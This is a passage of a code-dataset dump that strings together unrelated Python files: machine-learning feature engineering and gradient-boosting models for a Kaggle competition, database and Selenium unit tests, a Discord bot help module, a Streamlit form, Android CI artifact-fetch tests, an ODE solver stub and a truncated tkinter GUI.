declaration\n\n last_activity = 0\n\n \n\n user_activities_count = {'Clip':0, 'Activity': 0, 'Assessment': 0, 'Game':0}\n\n \n\n # new features: time spent in each activity\n\n last_session_time_sec = 0\n\n accuracy_groups = {0:0, 1:0, 2:0, 3:0}\n\n all_assessments = []\n\n accumulated_accuracy_group = 0\n\n accumulated_accuracy = 0\n\n accumulated_correct_attempts = 0 \n\n accumulated_uncorrect_attempts = 0\n\n accumulated_actions = 0\n\n counter = 0\n\n time_first_activity = float(user_sample['timestamp'].values[0])\n\n durations = []\n\n last_accuracy_title = {'acc_' + title: -1 for title in assess_titles}\n\n event_code_count: Dict[str, int] = {ev: 0 for ev in list_of_event_code}\n\n event_id_count: Dict[str, int] = {eve: 0 for eve in list_of_event_id}\n\n title_count: Dict[str, int] = {eve: 0 for eve in activities_labels.values()} \n\n title_event_code_count: Dict[str, int] = {t_eve: 0 for t_eve in all_title_event_code}\n\n \n\n # last features\n\n sessions_count = 0\n\n \n\n # itarates through each session of one instalation_id\n\n for i, session in user_sample.groupby('game_session', sort=False):\n\n # i = game_session_id\n\n # session is a DataFrame that contain only one game_session\n\n \n\n # get some sessions information\n\n session_type = session['type'].iloc[0]\n\n session_title = 
session['title'].iloc[0]\n\n session_title_text = activities_labels[session_title]\n\n \n\n \n\n # for each assessment, and only this kind off session, the features below are processed\n\n # and a register are generated\n\n if (session_type == 'Assessment') & (test_set or len(session)>1):\n\n # search for event_code 4100, that represents the assessments trial\n\n all_attempts = session.query(f'event_code == {win_code[session_title]}')\n\n # then, check the numbers of wins and the number of losses\n\n true_attempts = all_attempts['event_data'].str.contains('true').sum()\n\n false_attempts = all_attempts['event_data'].str.contains('false').sum()\n\n # copy a dict to use as feature template, it's initialized with some itens: \n\n # {'Clip':0, 'Activity': 0, 'Assessment': 0, 'Game':0}\n\n features = user_activities_count.copy()\n\n features.update(last_accuracy_title.copy())\n\n features.update(event_code_count.copy())\n\n features.update(event_id_count.copy())\n\n features.update(title_count.copy())\n\n features.update(title_event_code_count.copy())\n\n features.update(last_accuracy_title.copy())\n\n features['installation_session_count'] = sessions_count\n\n \n\n # get installation_id for aggregated features\n\n features['installation_id'] = session['installation_id'].iloc[-1]\n\n # add title as feature, remembering that title represents the name of the game\n\n features['session_title'] = session['title'].iloc[0]\n\n # the 4 lines below add the feature of the history of the trials of this player\n\n # this is based on the all time attempts so far, at the moment of this assessment\n\n features['accumulated_correct_attempts'] = accumulated_correct_attempts\n\n features['accumulated_uncorrect_attempts'] = accumulated_uncorrect_attempts\n\n accumulated_correct_attempts += true_attempts \n\n accumulated_uncorrect_attempts += false_attempts\n\n # the time spent in the app so far\n\n if durations == []:\n\n features['duration_mean'] = 0\n\n features['duration_std'] = 0\n\n else:\n\n features['duration_mean'] = np.mean(durations)\n\n features['duration_std'] = np.std(durations)\n\n durations.append((session.iloc[-1, 2] - session.iloc[0, 2] ).seconds)\n\n # the accurace is the all time wins divided by the all time attempts\n\n features['accumulated_accuracy'] = accumulated_accuracy/counter if counter > 0 else 0\n\n accuracy = true_attempts/(true_attempts+false_attempts) if (true_attempts+false_attempts) != 0 else 0\n\n accumulated_accuracy += accuracy\n\n last_accuracy_title['acc_' + session_title_text] = accuracy\n\n # a feature of the current accuracy categorized\n\n # it is a counter of how many times this player was in each accuracy group\n\n if accuracy == 0:\n\n features['accuracy_group'] = 0\n\n elif accuracy == 1:\n\n features['accuracy_group'] = 3\n\n elif accuracy == 0.5:\n\n features['accuracy_group'] = 2\n\n else:\n\n features['accuracy_group'] = 1\n\n features.update(accuracy_groups)\n\n accuracy_groups[features['accuracy_group']] += 1\n\n # mean of the all accuracy groups of this player\n\n features['accumulated_accuracy_group'] = accumulated_accuracy_group/counter if counter > 0 else 0\n\n accumulated_accuracy_group += features['accuracy_group']\n\n # how many actions the player has done so far, it is initialized as 0 and updated some lines below\n\n features['accumulated_actions'] = accumulated_actions\n\n \n\n # there are some conditions to allow this features to be inserted in the datasets\n\n # if it's a test set, all sessions belong to the final dataset\n\n # it it's a train, 
needs to be passed throught this clausule: session.query(f'event_code == {win_code[session_title]}')\n\n # that means, must exist an event_code 4100 or 4110\n\n if test_set:\n\n all_assessments.append(features)\n\n elif true_attempts+false_attempts > 0:\n\n all_assessments.append(features)\n\n \n\n counter += 1\n\n \n\n sessions_count += 1\n\n # this piece counts how many actions was made in each event_code so far\n\n def update_counters(counter: dict, col: str):\n\n num_of_session_count = Counter(session[col])\n\n for k in num_of_session_count.keys():\n\n x = k\n\n if col == 'title':\n\n x = activities_labels[k]\n\n counter[x] += num_of_session_count[k]\n\n return counter\n\n \n\n event_code_count = update_counters(event_code_count, \"event_code\")\n\n event_id_count = update_counters(event_id_count, \"event_id\")\n\n title_count = update_counters(title_count, 'title')\n\n title_event_code_count = update_counters(title_event_code_count, 'title_event_code')\n\n\n\n # counts how many actions the player has done so far, used in the feature of the same name\n\n accumulated_actions += len(session)\n\n if last_activity != session_type:\n\n user_activities_count[session_type] += 1\n\n last_activitiy = session_type \n\n \n\n # if it't the test_set, only the last assessment must be predicted, the previous are scraped\n\n if test_set:\n\n return all_assessments[-1]\n\n # in the train_set, all assessments goes to the dataset\n\n return all_assessments\ndef get_train_and_test(train, test):\n\n compiled_train = []\n\n compiled_test = []\n\n for i, (ins_id, user_sample) in tqdm(enumerate(train.groupby('installation_id', sort = False)), total = 17000):\n\n compiled_train += get_data(user_sample)\n\n for ins_id, user_sample in tqdm(test.groupby('installation_id', sort = False), total = 1000):\n\n test_data = get_data(user_sample, test_set = True)\n\n compiled_test.append(test_data)\n\n reduce_train = pd.DataFrame(compiled_train)\n\n reduce_test = pd.DataFrame(compiled_test)\n\n categoricals = ['session_title']\n\n return reduce_train, reduce_test, categoricals\ndef run_feature_selection(reduce_train, reduce_test, usefull_features, new_features):\n\n kf = StratifiedKFold(n_splits = 10, shuffle = True, random_state = 42)\n\n target = 'accuracy_group'\n\n oof_pred = np.zeros((len(reduce_train), 4))\n\n for fold, (tr_ind, val_ind) in enumerate(kf.split(reduce_train, reduce_train[target])):\n\n print('Fold {}'.format(fold + 1))\n\n x_train, x_val = reduce_train[usefull_features].iloc[tr_ind], reduce_train[usefull_features].iloc[val_ind]\n\n y_train, y_val = reduce_train[target][tr_ind], reduce_train[target][val_ind]\n\n train_set = lgb.Dataset(x_train, y_train, categorical_feature = categoricals)\n\n val_set = lgb.Dataset(x_val, y_val, categorical_feature = categoricals)\n\n\n\n params = {\n\n 'learning_rate': 0.01,\n\n 'metric': 'multiclass',\n\n 'objective': 'multiclass',\n\n 'num_classes': 4,\n\n 'feature_fraction': 0.75,\n\n 'subsample': 0.75,\n\n 'n_jobs': -1,\n\n 'seed': 50,\n\n 'max_depth': 10\n\n }\n\n\n\n model = lgb.train(params, train_set, num_boost_round = 100000, early_stopping_rounds = 100, \n\n valid_sets=[train_set, val_set], verbose_eval = 500)\n\n oof_pred[val_ind] = model.predict(x_val)\n\n # using cohen_kappa because it's the evaluation metric of the competition\n\n loss_score = cohen_kappa_score(reduce_train[target], np.argmax(oof_pred, axis = 1), weights = 'quadratic')\n\n score = loss_score\n\n usefull_new_features = []\n\n for i in new_features:\n\n oof_pred = 
np.zeros((len(reduce_train), 4))\n\n evaluating_features = usefull_features + usefull_new_features + [i]\n\n print('Evaluating {} column'.format(i))\n\n print('Out best cohen kappa score is : {}'.format(score))\n\n for fold, (tr_ind, val_ind) in enumerate(kf.split(reduce_train, reduce_train[target])):\n\n print('Fold {}'.format(fold + 1))\n\n x_train, x_val = reduce_train[evaluating_features].iloc[tr_ind], reduce_train[evaluating_features].iloc[val_ind]\n\n y_train, y_val = reduce_train[target][tr_ind], reduce_train[target][val_ind]\n\n train_set = lgb.Dataset(x_train, y_train, categorical_feature = categoricals)\n\n val_set = lgb.Dataset(x_val, y_val, categorical_feature = categoricals)\n\n\n\n model = lgb.train(params, train_set, num_boost_round = 100000, early_stopping_rounds = 100, \n\n valid_sets=[train_set, val_set], verbose_eval = 500)\n\n oof_pred[val_ind] = model.predict(x_val)\n\n loss_score = cohen_kappa_score(reduce_train[target], np.argmax(oof_pred, axis = 1), weights = 'quadratic')\n\n print('Our new cohen kappa score is : {}'.format(loss_score))\n\n if loss_score > score:\n\n print('Feature {} is usefull, adding feature to usefull_new_features_list'.format(i))\n\n usefull_new_features.append(i)\n\n score = loss_score\n\n else:\n\n print('Feature {} is useless'.format(i))\n\n gc.collect()\n\n print('The best features are: ', usefull_new_features)\n\n print('Our best cohen kappa score is : ', score)\n\n\n\n return usefull_features + usefull_new_features\ndef run_lgb_regression(reduce_train, reduce_test, usefull_features, n_splits, random_state=42):\n\n kf = StratifiedKFold(n_splits=n_splits, shuffle = True, random_state = random_state)\n\n target = 'accuracy_group'\n\n oof_pred = np.zeros((len(reduce_train), ))\n\n y_pred = np.zeros((len(reduce_test), ))\n\n for fold, (tr_ind, val_ind) in enumerate(kf.split(reduce_train, reduce_train[target])):\n\n print('Fold {}'.format(fold + 1))\n\n x_train, x_val = reduce_train[usefull_features].iloc[tr_ind], reduce_train[usefull_features].iloc[val_ind]\n\n y_train, y_val = reduce_train[target][tr_ind], reduce_train[target][val_ind]\n\n train_set = lgb.Dataset(x_train, y_train, categorical_feature=categoricals)\n\n val_set = lgb.Dataset(x_val, y_val, categorical_feature=categoricals)\n\n\n\n params = {'n_estimators':5000,\n\n 'boosting_type': 'gbdt',\n\n 'objective': 'regression',\n\n 'metric': 'rmse',\n\n 'subsample': 0.75,\n\n 'subsample_freq': 1,\n\n 'learning_rate': 0.01,\n\n 'feature_fraction': 0.9,\n\n 'max_depth': 15,\n\n 'lambda_l1': 1, \n\n 'lambda_l2': 1,\n\n 'verbose': 100,\n\n 'early_stopping_rounds': 100\n\n }\n\n\n\n model = lgb.train(params, train_set, num_boost_round = 1000000, early_stopping_rounds = 300, \n\n valid_sets=[train_set, val_set], verbose_eval = 100)\n\n oof_pred[val_ind] = model.predict(x_val)\n\n y_pred += model.predict(reduce_test[usefull_features]) / n_splits\n\n _, loss_score, _ = eval_qwk_lgb_regr(reduce_train[target], oof_pred)\n\n print('Our oof cohen kappa score is: ', loss_score)\n\n\n\n return y_pred\n\ndef run_xgb_regression(reduce_train, reduce_test, usefull_features, n_splits, random_state=42):\n\n kf = StratifiedKFold(n_splits=n_splits, shuffle = True, random_state = random_state)\n\n target = 'accuracy_group'\n\n oof_pred = np.zeros((len(reduce_train), ))\n\n y_pred = np.zeros((len(reduce_test), ))\n\n for fold, (tr_ind, val_ind) in enumerate(kf.split(reduce_train, reduce_train[target])):\n\n print('Fold {}'.format(fold + 1))\n\n x_train, x_val = reduce_train[usefull_features].iloc[tr_ind], 
reduce_train[usefull_features].iloc[val_ind]\n\n y_train, y_val = reduce_train[target][tr_ind], reduce_train[target][val_ind]\n\n xgb_train = xgb.DMatrix(x_train, y_train)\n\n xgb_eval = xgb.DMatrix(x_val, y_val)\n\n\n\n pars = {\n\n 'colsample_bytree': 0.8, \n\n 'learning_rate': 0.01,\n\n 'max_depth': 10,\n\n 'subsample': 1,\n\n 'objective':'reg:squarederror',\n\n #'eval_metric':'rmse',\n\n 'min_child_weight':3,\n\n 'gamma':0.25,\n\n 'n_estimators':5000\n\n }\n\n\n\n model = xgb.train(pars,\n\n xgb_train,\n\n num_boost_round=5000,\n\n evals=[(xgb_train, 'train'), (xgb_eval, 'val')],\n\n verbose_eval=100,\n\n early_stopping_rounds=100\n\n )\n\n \n\n val_X=xgb.DMatrix(x_val)\n\n oof_pred[val_ind] = model.predict(val_X)\n\n test_X = xgb.DMatrix(reduce_test[usefull_features])\n\n y_pred += model.predict(test_X) / n_splits\n\n _, loss_score, _ = eval_qwk_lgb_regr(reduce_train[target], oof_pred)\n\n print('Our oof cohen kappa score is: ', loss_score)\n\n\n\n return y_pred\n\n#import gc\n\n#del reduce_train, reduce_test\n\n#gc.collect()\n# read data\n\ntrain, test, train_labels, specs, sample_submission = read_data()\n\n# get usefull dict with maping encode\n\ntrain, test, train_labels, win_code, list_of_user_activities, list_of_event_code, activities_labels, assess_titles, list_of_event_id, all_title_event_code = encode_title(train, test, train_labels)\n\n# tranform function to get the train and test set\n\nreduce_train, reduce_test, categoricals = get_train_and_test(train, test)\ndef plot_train_test_comp(feature):\n\n BINS = 50\n\n #data = reduce_train[reduce_train['accuracy_group'] == 3][feature]\n\n data = reduce_train[feature]\n\n train_mean = data.mean()\n\n perc_90 = np.percentile(data, 95)\n\n plt.hist(np.clip(data, 0, perc_90), bins=BINS, color='blue', alpha=0.5, weights=np.ones(len(data)) / len(data))\n\n data = reduce_test[feature] \n\n test_mean = data.mean()\n\n ajust_factor = train_mean / test_mean\n\n plt.hist(np.clip(data * ajust_factor, 0, perc_90), bins=BINS, color='red', alpha=0.5, weights=np.ones(len(data)) / len(data))\n\n plt.show()\n\n\n\nplot_train_test_comp('Clip')\n# call feature engineering function\n\nfeatures = reduce_train.loc[(reduce_train.sum(axis=1) != 0), (reduce_train.sum(axis=0) != 0)].columns # delete useless columns\n\nfeatures = [x for x in features if x not in ['accuracy_group', 'installation_id']]\nto_exclude = []\n\najusted_test = reduce_test.copy()\n\nfor feature in ajusted_test.columns:\n\n if feature not in ['accuracy_group', 'installation_id', 'accuracy_group', 'session_title']:\n\n data = reduce_train[feature]\n\n train_mean = data.mean()\n\n data = ajusted_test[feature] \n\n test_mean = data.mean()\n\n try:\n\n ajust_factor = train_mean / test_mean\n\n if ajust_factor > 10 or ajust_factor < 0.1:\n\n to_exclude.append(feature)\n\n print(feature, train_mean, test_mean)\n\n else:\n\n ajusted_test[feature] *= ajust_factor\n\n except:\n\n to_exclude.append(feature)\n\n print(feature, train_mean, test_mean)\nfeatures = [x for x in features if x not in to_exclude]\n\nreduce_train[features].shape\ny_lgb_pred = 0\n\nfor i in range(10):\n\n y_lgb_pred += run_lgb_regression(reduce_train, ajusted_test, features, 5, random_state=i) / 10\ny_lgb_pred = 0\n\nfor i in range(10):\n\n y_lgb_pred += run_lgb_regression(reduce_train, ajusted_test, features, 5, random_state=i) / 10\n\n\n\ny_xgb_pred = run_xgb_regression(reduce_train, ajusted_test, features, 5)\nlgb_weight = 0.7\n\nfinal_pred = y_lgb_pred * lgb_weight + y_xgb_pred * (1 - 
lgb_weight)\n\nprint(final_pred.shape, y_lgb_pred.shape, y_xgb_pred.shape)\ndist = Counter(reduce_train['accuracy_group'])\n\nfor k in dist:\n\n dist[k] /= len(reduce_train)\n\nreduce_train['accuracy_group'].hist()\n\n\n\nacum = 0\n\nbound = {}\n\nfor i in range(3):\n\n acum += dist[i]\n\n bound[i] = np.percentile(final_pred, acum * 100)\n\nprint(bound)\n\n\n\ndef classify(x):\n\n if x <= bound[0]:\n\n return 0\n\n elif x <= bound[1]:\n\n return 1\n\n elif x <= bound[2]:\n\n return 2\n\n else:\n\n return 3\n\n \n\nfinal_pred = np.array(list(map(classify, final_pred)))\n\n\n\nsample_submission['accuracy_group'] = final_pred.astype(int)\n\nsample_submission.to_csv('submission.csv', index=False)\n\nsample_submission['accuracy_group'].value_counts(normalize=True)","repo_name":"aorursy/new-nb-1","sub_path":"bamps53_kernel-random10.py","file_name":"bamps53_kernel-random10.py","file_ext":"py","file_size_in_byte":24378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74204724731","text":"import os\nimport unittest\nimport sqlite3\nimport db_setup\n\nDB_NAME = \"data.sqlite\"\n\nclass TestDBSetup(unittest.TestCase):\n \"\"\"\n The TestDBSetup class provides a suite of unit tests to verify the functionality\n of database setup operations as defined in db_setup.py. The tests ensure that:\n - A database connection can be successfully established.\n - The required tables (stock_data and sentiment_data) can be created successfully.\n\n Each test initializes a fresh test database and cleans it up after execution, ensuring\n isolation and preventing side effects between test cases.\n \"\"\"\n def setUp(self):\n # Before each test case, set up a new DB\n db_setup.setup_db()\n\n def tearDown(self):\n # Cleanup after each test by removing the DB\n try:\n os.remove(DB_NAME)\n except:\n pass\n\n def test_database_connection(self):\n conn = db_setup.connect_to_db()\n self.assertIsNotNone(conn)\n conn.close()\n\n def test_create_tables(self):\n conn = sqlite3.connect(DB_NAME)\n cur = conn.cursor()\n\n # Check if stock_data table exists\n cur.execute(\"SELECT count(name) FROM sqlite_master WHERE type='table' AND name='stock_data'\")\n self.assertEqual(cur.fetchone()[0], 1, \"stock_data table does not exist.\")\n\n # Check if sentiment_data table exists\n cur.execute(\"SELECT count(name) FROM sqlite_master WHERE type='table' AND name='sentiment_data'\")\n self.assertEqual(cur.fetchone()[0], 1, \"sentiment_data table does not exist.\")\n\n conn.close()\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"JacobYealy/StockPredictor","sub_path":"tests/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"11316242870","text":"import discord\nimport re\n\nimport baseClass\n\ntry:\n import psutil\nexcept ImportError:\n psutil = False\n\nclass help(baseClass.baseClass):\n defaultHelpMessage = {\"title\":\"JoeBot Help\", \"description\":\"Developer: <@365154655313068032> [(GitHub)](https://github.com/JoeBlakeB/DiscordBot)\\n\\nTo use JoeBot, say:\\n**<@796433833296658442> **\\nor **joebot **\\nor **!**\\nor in direct messages with just the command\", \"thumbnail\":\"https://cdn.discordapp.com/avatars/796433833296658442/45d01f0b2d42a5e23e552b75f359525e.png\"}\n helpRegex = False\n async def helpCommand(message, messageContentLower, bot):\n if not help.helpRegex:\n help.compileRegex()\n\n if messageContentLower[0] == 
\"!\":\n exclamation = True\n messageContentLower = messageContentLower[6:]\n else:\n exclamation = False\n messageContentLower = messageContentLower[12:]\n\n if messageContentLower == \"\":\n return await help.embed(message, help.defaultHelpMessage, await help.jmusicplayerInfo())\n\n for command in help.helpRegex:\n if command.match(messageContentLower):\n if \"embed\" in help.helpRegex[command][0]:\n return await help.embed(message, help.helpRegex[command][1])\n elif \"plaintext\" in help.helpRegex[command][0]:\n return await message.channel.send(help.helpRegex[command][1])\n else:\n if not exclamation:\n await help.embed(message, help.defaultHelpMessage, await help.jmusicplayerInfo())\n\n async def embed(message, embedContent, descriptionExtra = \"\"):\n embed = discord.Embed()\n embed.title = embedContent[\"title\"]\n embed.description = embedContent[\"description\"] + descriptionExtra\n if \"thumbnail\" in embedContent:\n embed.set_thumbnail(url=embedContent[\"thumbnail\"])\n await message.channel.send(embed=embed)\n\n def compileRegex():\n help.helpRegex = {}\n availableCommands = []\n for command in help.help:\n help.helpRegex[re.compile(command)] = help.help[command]\n if \"include\" in help.help[command][0]:\n availableCommands.append(command)\n\n if len(availableCommands) != 0:\n help.defaultHelpMessage[\"description\"] += \"\\n\\nAvailable Commands:\\n\" + \", \".join(availableCommands) + \"\\n\\nUse **<@796433833296658442> help ** for more information.\"\n\n async def jmusicplayerInfo():\n if psutil:\n for proc in psutil.process_iter():\n if len(proc.cmdline()) == 4:\n if proc.cmdline()[:-1] == [\"/usr/bin/java\", \"-Dnogui=true\", \"-jar\"] and \"JMusicBot\" in proc.cmdline()[-1]:\n return \"\\n\\n[JMusicBot](https://github.com/jagrosh/MusicBot) is currently running on JoeBot, use **!MusicHelp** for help music commands.\"\n return \"\"\n\n\nhelp.mentionedCommands[\"help(?!\\S)\"] = [help.helpCommand, [\"message\", \"messageContentLower\", \"bot\"], {}]\nhelp.exclamationCommands[\"help(?!\\S)\"] = [help.helpCommand, [\"message\", \"messageContentLower\", \"bot\"], {}]\n","repo_name":"JoeBlakeB/DiscordBot","sub_path":"modules/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74010395130","text":"#!/usr/bin/env python3\n\nimport time\nfrom cli import ArgumentParser\nfrom cli.actions import ActionFactory\n\n\ndef main():\n start = time.time()\n args = ArgumentParser().parse_args()\n\n try:\n action = ActionFactory.create_action(args)\n for benchmark in args.benchmarks:\n action(benchmark)\n except Exception as e:\n print(e)\n exit()\n\n print(f\"Elapsed time: {time.time() - start} s\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"julian-muellner/blizzard","sub_path":"blizzard.py","file_name":"blizzard.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3209408705","text":"import streamlit as st\n\ndef ricerca_stand(col, nome, cognome, stand):\n query_string = {}\n\n if nome != \"\":\n query_string[\"nome\"] = nome\n\n if cognome != \"\":\n query_string[\"cognome\"] = cognome\n\n res = list(col.find(query_string))\n\n if len(res) == 0:\n st.error(\"Nessun risultato\")\n elif len(res) != 1:\n st.error(\"Errore: più risultati trovati.\")\n elif res[0][\"stand_visitati\"][stand]:\n st.error(nome+\" \"+ cognome + \" ha già visitato questo 
stand!\")\n else:\n numero = res[0][\"coppia\"][\"_id\"]\n col.update_one(res[0], {\"$set\": {\"stand_visitati.\"+stand:True}})\n st.success(\"Consegna la busta numero \" + str(numero))\n\ndef stand(col):\n stands = {\n \"A\": \"Colore preferito\",\n \"B\": \"Età\",\n \"C\": \"Cibo preferito\",\n \"D\": \"Sport o hobby\",\n \"E\": \"Cosa vuoi fare da grande\",\n \"F\": \"Serie TV preferita\",\n \"G\": \"Cantante/Gruppo preferito\",\n \"H\": \"Gioco preferito al campo\",\n \"I\": \"Materia preferita a scuola\",\n \"L\": \"Youtuber preferito\",\n }\n labels = [ key + \" - \" + stands[key] for key in stands]\n\n st.title(\"Stand\")\n with st.form(\"Ricerca stand\"):\n st.write(\"Seleziona stand\")\n label = st.selectbox(\"Stand\", labels) #cachare questa risposta\n st.write(\"Inserisci nome e cognome\")\n nome = st.text_input('Inserisci nome')\n cognome = st.text_input('Inserisci cognome')\n # Every form must have a submit button.\n submitted = st.form_submit_button(\"Cerca\")\n if submitted:\n selected_stand = label.split(\" - \")[0]\n ricerca_stand(col, nome, cognome, selected_stand)\n\n\n","repo_name":"francescodeaglio/opening22","sub_path":"stand_individui.py","file_name":"stand_individui.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24585574530","text":"import unittest\nimport time\n# import re\n# import HtmlTestRunner\nfrom selenium import webdriver\n# from selenium.webdriver.common.by import By\n# from selenium.webdriver.common.keys import Keys\n# from selenium.webdriver.support.ui import Select\n# from selenium.common.exceptions import NoSuchElementException\n# from selenium.common.exceptions import NoAlertPresentException\n# from selenium.common.exceptions import TimeoutException\n# from selenium.webdriver.support.ui import WebDriverWait\n# from selenium.webdriver.support import expected_conditions as EC\n\n\nclass SearchText(unittest.TestCase):\n @classmethod\n def setUp(cls):\n cls.driver = webdriver.Chrome(executable_path=\"../drivers/chromedriver.exe\")\n cls.driver.implicitly_wait(10)\n cls.driver.maximize_window()\n cls.driver.get(\"http://www.google.com/\")\n\n def test_search_by_text(self):\n self.search_field = self.driver.find_element_by_name(\"q\")\n # self.search_field.send_keys(\"Selenium WebDriver Interview questions\")\n self.search_field.submit()\n\n #\n # lists = self.driver.find_elements_by_class_name(\"r\")\n # no=len(lists)\n # self.assertEqual(11, len(lists))\n @classmethod\n def tearDown(cls):\n time.sleep(2)\n cls.driver.close()\n cls.driver.quit()\n print('TEST COMPLETE')\n\n if __name__ == \"__main__\":\n unittest.main(verbosity=2)\n","repo_name":"Kaythreefelix/dsProd_Framework","sub_path":"demoTests/googleTemplate.py","file_name":"googleTemplate.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43326476224","text":"from typing import cast\n\nimport pytest\nfrom aiohttp import ClientResponseError, ClientSession\nfrom aiohttp.test_utils import TestClient\nfrom aiohttp.web import Application, Request, Response\n\nfrom fetchartifact import fetch_artifact, fetch_artifact_chunked\n\nTEST_BUILD_ID = \"1234\"\nTEST_TARGET = \"linux\"\nTEST_ARTIFACT_NAME = \"output.zip\"\nTEST_DOWNLOAD_URL = (\n f\"/android/internal/build/v3/builds/{TEST_BUILD_ID}/{TEST_TARGET}/\"\n f\"attempts/latest/artifacts/{TEST_ARTIFACT_NAME}/url\"\n)\nTEST_RESPONSE = b\"Hello, 
world!\"\n\n\n@pytest.fixture(name=\"android_ci_client\")\nasync def fixture_android_ci_client(aiohttp_client: type[TestClient]) -> TestClient:\n \"\"\"Fixture for mocking the Android CI APIs.\"\"\"\n\n async def download(_request: Request) -> Response:\n return Response(text=TEST_RESPONSE.decode(\"utf-8\"))\n\n app = Application()\n app.router.add_get(TEST_DOWNLOAD_URL, download)\n return await aiohttp_client(app) # type: ignore\n\n\nasync def test_fetch_artifact(android_ci_client: TestClient) -> None:\n \"\"\"Tests that the download URL is queried.\"\"\"\n assert TEST_RESPONSE == await fetch_artifact(\n TEST_TARGET,\n TEST_BUILD_ID,\n TEST_ARTIFACT_NAME,\n cast(ClientSession, android_ci_client),\n query_url_base=\"\",\n )\n\n\nasync def test_fetch_artifact_chunked(android_ci_client: TestClient) -> None:\n \"\"\"Tests that the full file contents are downloaded.\"\"\"\n assert [c.encode(\"utf-8\") for c in TEST_RESPONSE.decode(\"utf-8\")] == [\n chunk\n async for chunk in fetch_artifact_chunked(\n TEST_TARGET,\n TEST_BUILD_ID,\n TEST_ARTIFACT_NAME,\n cast(ClientSession, android_ci_client),\n chunk_size=1,\n query_url_base=\"\",\n )\n ]\n\n\nasync def test_failure_raises(android_ci_client: TestClient) -> None:\n \"\"\"Tests that fetch failure raises an exception.\"\"\"\n with pytest.raises(ClientResponseError):\n await fetch_artifact(\n TEST_TARGET,\n TEST_BUILD_ID,\n TEST_ARTIFACT_NAME,\n cast(ClientSession, android_ci_client),\n query_url_base=\"/bad\",\n )\n\n with pytest.raises(ClientResponseError):\n async for _chunk in fetch_artifact_chunked(\n TEST_TARGET,\n TEST_BUILD_ID,\n TEST_ARTIFACT_NAME,\n cast(ClientSession, android_ci_client),\n query_url_base=\"/bad\",\n ):\n pass\n\n\n@pytest.mark.requires_network\nasync def test_real_artifact() -> None:\n \"\"\"Tests with a real artifact. 
Requires an internet connection.\"\"\"\n async with ClientSession() as session:\n contents = await fetch_artifact(\"linux\", \"9945621\", \"logs/SUCCEEDED\", session)\n assert contents == b\"1681499053\\n\"\n","repo_name":"aosp-mirror/platform_development","sub_path":"python-packages/fetchartifact/tests/test_fetchartifact.py","file_name":"test_fetchartifact.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":2703,"dataset":"github-code","pt":"78"} +{"seq_id":"30131703417","text":"import numpy as np\nfrom S3T2_solve_ode.py.one_step_methods import OneStepMethod\n\n\n# coefficients for Adams methods\nadams_coeffs = {\n 1: [1],\n 2: [-1 / 2, 3 / 2],\n 3: [5 / 12, -4 / 3, 23 / 12],\n 4: [-3 / 8, 37 / 24, -59 / 24, 55 / 24],\n 5: [251 / 720, -637 / 360, 109 / 30, -1387 / 360, 1901 / 720]\n}\n\n\ndef adams(func, y_start, T, coeffs, one_step_method: OneStepMethod):\n \"\"\"\n T: list of timestamps\n coeffs: list of coefficients\n one_step_method: method for initial steps\n return list of t (same as T), list of y\n \"\"\"\n raise NotImplementedError\n","repo_name":"7KASPAR7/University-Homeworks","sub_path":"sem4/chm-master/S3T2_solve_ode/py/multistep_methods.py","file_name":"multistep_methods.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31839436474","text":"import tkinter\nfrom tkinter import *\nimport shopee_data as sd\nimport matplotlib.pyplot as plt\nimport map\nfrom graphic_data import draw_scatter_figure, show_GUI_table\nfrom tkhtmlview import HTMLLabel\n\n\n# tkinter 套件\n# 建立容器 tkinter.Tk()\n# 設定視窗名子 .title\n# 各類元件\n# 建立框架 Frame()\n# 標籤 label() (放圖或文字)\n# 按鈕 button() (透過event觸發寫好的函式)\n# 布局\n# 設定布局 grid() (從左上 0,0開始)\n# 控制視窗\n# tk.mainloop() (一直顯示)\n# destroy() 關掉該視窗\ndef inputbox():\n def button_event():\n root.destroy()\n\n root = tkinter.Tk()\n root.title('今天什麼最銷售')\n root.geometry('400x100')\n title = tkinter.Label(root, text='輸入想查詢的商品', bg='yellow', fg='#263238', font=('Arial', 12))\n title.grid(row=0, column=0)\n var = tkinter.StringVar()\n myentry = tkinter.Entry(root, width=20, textvariable=var)\n myentry.grid(row=0, column=1)\n mybutton = tkinter.Button(root, text='Search', command=button_event)\n mybutton.grid(row=1, column=1)\n root.mainloop()\n return var.get()\n\n\ndef mainframe(df,df1,keyword):\n def create_map():\n GUI_4() #地圖\n\n def action1():\n show_graph() # 畫圓餅圖\n\n def action2():\n draw_scatter_figure(df1) #列出4大種類\n\n def action3():\n GUI_3(df) #同類商品價格\n t = tkinter.Tk()\n button_width = 34\n button_height = 4\n t.title('蝦皮產品分析')\n start_frame = Frame(width=1000, height=500)\n button_frame = Frame(width=1000, height=100, pady=10)\n start_frame.grid(row=0, column=0)\n button_frame.grid(row=2, column=0)\n\n fontStyle = tkinter.font.Font(family=\"Lucida Grande\", size=30)\n fontStyle2 = tkinter.font.Font(family=\"Lucida Grande\", size=20)\n button_fontStyle = tkinter.font.Font(family=\"Lucida Grande\", size=10)\n\n button1 = Button(button_frame, text='目前最熱門', width=button_width, height=button_height, command=action1,font=button_fontStyle,fg='SlateGray')\n button1.grid(row=2, column=0)\n button2 = Button(button_frame, text='商品價格分布(以除去離群值)', width=button_width, height=button_height, command=action2, font=button_fontStyle,\n fg='SlateGray')\n button2.grid(row=2, column=1)\n button3 = Button(button_frame, 